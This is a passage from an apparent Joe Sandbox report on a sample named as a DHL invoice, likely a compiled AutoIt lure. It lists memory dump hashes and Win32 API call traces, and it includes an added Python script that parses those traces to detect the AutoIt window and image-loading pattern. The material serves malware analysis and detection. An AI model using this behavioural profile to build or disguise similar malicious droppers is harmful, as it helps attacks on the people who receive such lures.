                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bd9af9f2d04dd9838f72a2c4aad2394e77dbc3f51be658f62c830b97f66ecca9
                                                                                                                        • Instruction ID: 87b1cebe20a055e0e646aaf7721ccca6b24fc8e1b4257e4b8001c9091c69b1e1
                                                                                                                        • Opcode Fuzzy Hash: bd9af9f2d04dd9838f72a2c4aad2394e77dbc3f51be658f62c830b97f66ecca9
                                                                                                                        • Instruction Fuzzy Hash: 86323422D2AF414DD7239635DC22336A34DAFB73C9F55D737E82AB59A9EB29C4834100
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e55149ace45c7def1be7fb61e160e67d56db4945c9785c408e81ed85a4a2600d
                                                                                                                        • Instruction ID: 87922e76f4e6d2fd5d3c938dc8fa292d67330d1c10064cc05516cf8c9a47f5a5
                                                                                                                        • Opcode Fuzzy Hash: e55149ace45c7def1be7fb61e160e67d56db4945c9785c408e81ed85a4a2600d
                                                                                                                        • Instruction Fuzzy Hash: 5F322931A203058BCF2BEF28C4D467D77E5EB45300F2AA5A6D959CB691D334ED82DB60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 163b2c3eb46c6e4424389b5eaa4663f62bc4e01e61c5b2fdeaee4d923eca2d28
                                                                                                                        • Instruction ID: b6eb8ae1ee6b93fa5049093fe66cede10633e858352e03797b0a45cd189a05d1
                                                                                                                        • Opcode Fuzzy Hash: 163b2c3eb46c6e4424389b5eaa4663f62bc4e01e61c5b2fdeaee4d923eca2d28
                                                                                                                        • Instruction Fuzzy Hash: 3022C5B0A04609DFDF2ACF64C881BAEB7F5FF44300F148529E816AB291E779AD55CB50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 173ee0a583ef58f4868ba07c5b8f27ce1ee702fa18a82e3ec32293f02908996e
                                                                                                                        • Instruction ID: a7d6568ea985bfd08146b545012f90ad704c955f8f8a54da772715e7f8e639ee
                                                                                                                        • Opcode Fuzzy Hash: 173ee0a583ef58f4868ba07c5b8f27ce1ee702fa18a82e3ec32293f02908996e
                                                                                                                        • Instruction Fuzzy Hash: 8202C7B1E0010AEFDB16DF54D881AAEB7B5FF48300F118169E81ADF290E735EA50CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                        • Instruction ID: 3a9756473ca93097744823709d188ca7979b38f64e769c3963f3a9d3c1607c6c
                                                                                                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                        • Instruction Fuzzy Hash: E49176321080E34ADB2B463A8535A7EFFF15A523A371B079DDCF2CA1E5EE10895CD620
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                        • Instruction ID: 2115388321932e1fc467189b9025db696693b645c345a8c02604e3e6c2dc723c
                                                                                                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                        • Instruction Fuzzy Hash: 489162722090A34ADB2F427A857493EFFE55A923A331B079DDCF2CA1E1FE14855CD620
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5c7949ccfd2543fe1f458a2429c216c18799797b714e129f0d1d6ee25222db85
                                                                                                                        • Instruction ID: 24792e704e75b2cc33db58e763e26862aea1949da438974faa2a8e0e60c2dd03
                                                                                                                        • Opcode Fuzzy Hash: 5c7949ccfd2543fe1f458a2429c216c18799797b714e129f0d1d6ee25222db85
                                                                                                                        • Instruction Fuzzy Hash: 7461677160878957EA3B9A28B899FBE2398DF41303F150919EC43DF3B1DA119E4E8355
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                        • Instruction ID: d5080c76cfcf36ab21411d02bca05b3ebdc67adb365ee61284d1b994834fc9ff
                                                                                                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                        • Instruction Fuzzy Hash: FB8187725080A309DB6F423D8534A7EFFE15A923A371B079DDCF2CA1E1EE14995CE660
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                        • Instruction ID: a1cc199c48ef92af60b0bea4c687ebfd0763b06e96ec75d0028551cf677b7fd6
                                                                                                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                        • Instruction Fuzzy Hash: FC41A271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                        • Instruction ID: ed8e669699fdb027b4491704bbbfa29b5a8d72e2b0095fe130361223cda785f6
                                                                                                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                        • Instruction Fuzzy Hash: 06019D78A00209EFCB48DF98D5909AEF7F5FB48310F208699E909A7716D730AE51DB80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                        • Instruction ID: 781d5565b1e1a63f3b96cb093d283896925702b04695540286bc428823dac337
                                                                                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                        • Instruction Fuzzy Hash: F5019278A05209EFCB49DF98C5909AEF7F6FB48310F208599E809A7301D730AE41DB80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                        APIs
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 003B2B30
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 003B2B43
                                                                                                                        • DestroyWindow.USER32 ref: 003B2B52
                                                                                                                        • GetDesktopWindow.USER32 ref: 003B2B6D
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 003B2B74
                                                                                                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 003B2CA3
                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 003B2CB1
                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2CF8
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 003B2D04
                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003B2D40
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D62
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D75
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D80
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 003B2D89
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D98
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003B2DA1
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2DA8
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 003B2DB3
                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2DC5
                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,003CFC38,00000000), ref: 003B2DDB
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 003B2DEB
                                                                                                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 003B2E11
                                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 003B2E30
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2E52
                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B303F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                        • Opcode ID: 5a15b29d0f92d6443157d77f33eaa8f4a3937e3f0f29ae87378681213ebd7574
                                                                                                                        • Instruction ID: 1de84994881bc7ba5186d394dc5446646b45e41f7bdbbae5efb9268e0dcd2ec8
                                                                                                                        • Opcode Fuzzy Hash: 5a15b29d0f92d6443157d77f33eaa8f4a3937e3f0f29ae87378681213ebd7574
                                                                                                                        • Instruction Fuzzy Hash: FD027C71910219AFDB16DF64CD89EAE7BB9EF49314F048518F919EB2A1CB70ED01CB60
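The API sequence in the block above is what a splash-image window in the AutoIt runtime does, which is consistent with the report's "Binary is likely a compiled AutoIt script file" signature: it creates a window of class "AutoIt v3" and a "static" child, reads a file into an HGLOBAL (CreateFileW, GetFileSize, GlobalAlloc, ReadFile), wraps it in an IStream (CreateStreamOnHGlobal), decodes it with OleLoadPicture, and pushes the bitmap into the static control with SendMessageW and message 0x172 (STM_SETIMAGE). The Python below is an added example, not part of the Joe Sandbox report: it parses trace lines in the layout rendered on this page and flags that pattern. The line regex is an assumption about the rendered format; the sample input is a subset of lines copied from the block above plus one "Part of subcall function" line from the next block to exercise that prefix.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Win32 static-control message that assigns an image to a STATIC window.
STM_SETIMAGE = 0x0172

# One rendered trace line (assumed layout):
#   • CreateFileW.KERNEL32(?,80000000,...), ref: 003B2D62
#   • GetDesktopWindow.USER32 ref: 003B2B6D                 (no argument list)
#     • Part of subcall function 003C73E8: GetSysColor.USER32(00000012), ref: 003C7421
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw argument strings; "?" means the sandbox could not resolve it
    ref: int                 # address of the call site
    subcall: Optional[int]   # callee address when the line is a "Part of subcall" entry


def parse_trace(text: str) -> List[ApiCall]:
    """Return the API calls in `text`; headings such as 'APIs' or 'Strings' are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        sub = m.group("sub")
        calls.append(ApiCall(api=m.group("api"), module=m.group("mod"), args=args,
                             ref=int(m.group("ref"), 16),
                             subcall=int(sub, 16) if sub else None))
    return calls


def arg_int(call: ApiCall, index: int) -> Optional[int]:
    """Argument `index` as an integer, or None if it is missing or unresolved ('?')."""
    if index >= len(call.args):
        return None
    try:
        return int(call.args[index], 16)
    except ValueError:
        return None


def window_classes(calls: List[ApiCall]) -> List[str]:
    """lpClassName (second argument) of every CreateWindowExW call with a resolved class."""
    return [c.args[1] for c in calls
            if c.api == "CreateWindowExW" and len(c.args) > 1 and c.args[1] != "?"]


def looks_like_autoit_window(calls: List[ApiCall]) -> bool:
    """The AutoIt runtime registers its hidden main window under the class 'AutoIt v3'."""
    return "AutoIt v3" in window_classes(calls)


def has_picture_load_chain(calls: List[ApiCall]) -> bool:
    """True when, in order, an HGLOBAL is wrapped in an IStream (CreateStreamOnHGlobal),
    decoded with OleLoadPicture, and handed to a static control via STM_SETIMAGE."""
    stages = ["CreateStreamOnHGlobal", "OleLoadPicture", "STM_SETIMAGE"]
    stage = 0
    for c in calls:
        token = c.api
        if c.api == "SendMessageW" and arg_int(c, 1) == STM_SETIMAGE:
            token = "STM_SETIMAGE"
        if token == stages[stage]:
            stage += 1
            if stage == len(stages):
                return True
    return False


# Constructed input: lines copied from the trace above, plus one subcall line from the next block.
SAMPLE_TRACE = """\
APIs
• GetDesktopWindow.USER32 ref: 003B2B6D
• CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2CF8
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003B2D40
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D62
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D98
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2DC5
• OleLoadPicture.OLEAUT32(?,00000000,00000000,003CFC38,00000000), ref: 003B2DDB
• SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 003B2E30
  • Part of subcall function 003C73E8: GetSysColor.USER32(00000012), ref: 003C7421
Strings
"""

if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    print(len(calls), "calls; window classes:", window_classes(calls))
    print("AutoIt window:", looks_like_autoit_window(calls))
    print("stream -> OleLoadPicture -> STM_SETIMAGE:", has_picture_load_chain(calls))
```

The ordered-stage check deliberately keys on the message number rather than on SendMessageW alone, since the same function sends other messages; an unresolved argument ("?") parses to None and never matches, so a partially resolved trace fails closed rather than producing a false hit.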
                                                                                                                        APIs
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 003C712F
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 003C7160
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 003C716C
                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 003C7186
                                                                                                                        • SelectObject.GDI32(?,?), ref: 003C7195
                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 003C71C0
                                                                                                                        • GetSysColor.USER32(00000010), ref: 003C71C8
                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 003C71CF
                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 003C71DE
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 003C71E5
                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 003C7230
                                                                                                                        • FillRect.USER32(?,?,?), ref: 003C7262
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003C7284
                                                                                                                          • Part of subcall function 003C73E8: GetSysColor.USER32(00000012), ref: 003C7421
                                                                                                                          • Part of subcall function 003C73E8: SetTextColor.GDI32(?,?), ref: 003C7425
                                                                                                                          • Part of subcall function 003C73E8: GetSysColorBrush.USER32(0000000F), ref: 003C743B
                                                                                                                          • Part of subcall function 003C73E8: GetSysColor.USER32(0000000F), ref: 003C7446
                                                                                                                          • Part of subcall function 003C73E8: GetSysColor.USER32(00000011), ref: 003C7463
                                                                                                                          • Part of subcall function 003C73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003C7471
                                                                                                                          • Part of subcall function 003C73E8: SelectObject.GDI32(?,00000000), ref: 003C7482
                                                                                                                          • Part of subcall function 003C73E8: SetBkColor.GDI32(?,00000000), ref: 003C748B
                                                                                                                          • Part of subcall function 003C73E8: SelectObject.GDI32(?,?), ref: 003C7498
                                                                                                                          • Part of subcall function 003C73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 003C74B7
                                                                                                                          • Part of subcall function 003C73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003C74CE
                                                                                                                          • Part of subcall function 003C73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 003C74DB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4124339563-0
                                                                                                                        • Opcode ID: 7cf6592574fe623038519772a355cb3d1259262cca3679425721411da5412a85
                                                                                                                        • Instruction ID: 287f7da80c1d5ea5cb6ab1ebe75e7da88d9714212613e536b2618f1be68aba8c
                                                                                                                        • Opcode Fuzzy Hash: 7cf6592574fe623038519772a355cb3d1259262cca3679425721411da5412a85
                                                                                                                        • Instruction Fuzzy Hash: 9FA19D72018301AFDB029F61DC48E6BBBA9FB89320F141A19F966D61E1D731F944CF91
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(?,?), ref: 00348E14
                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00386AC5
                                                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00386AFE
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00386F43
                                                                                                                          • Part of subcall function 00348F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00348BE8,?,00000000,?,?,?,?,00348BBA,00000000,?), ref: 00348FC5
                                                                                                                        • SendMessageW.USER32(?,00001053), ref: 00386F7F
                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00386F96
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00386FAC
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00386FB7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
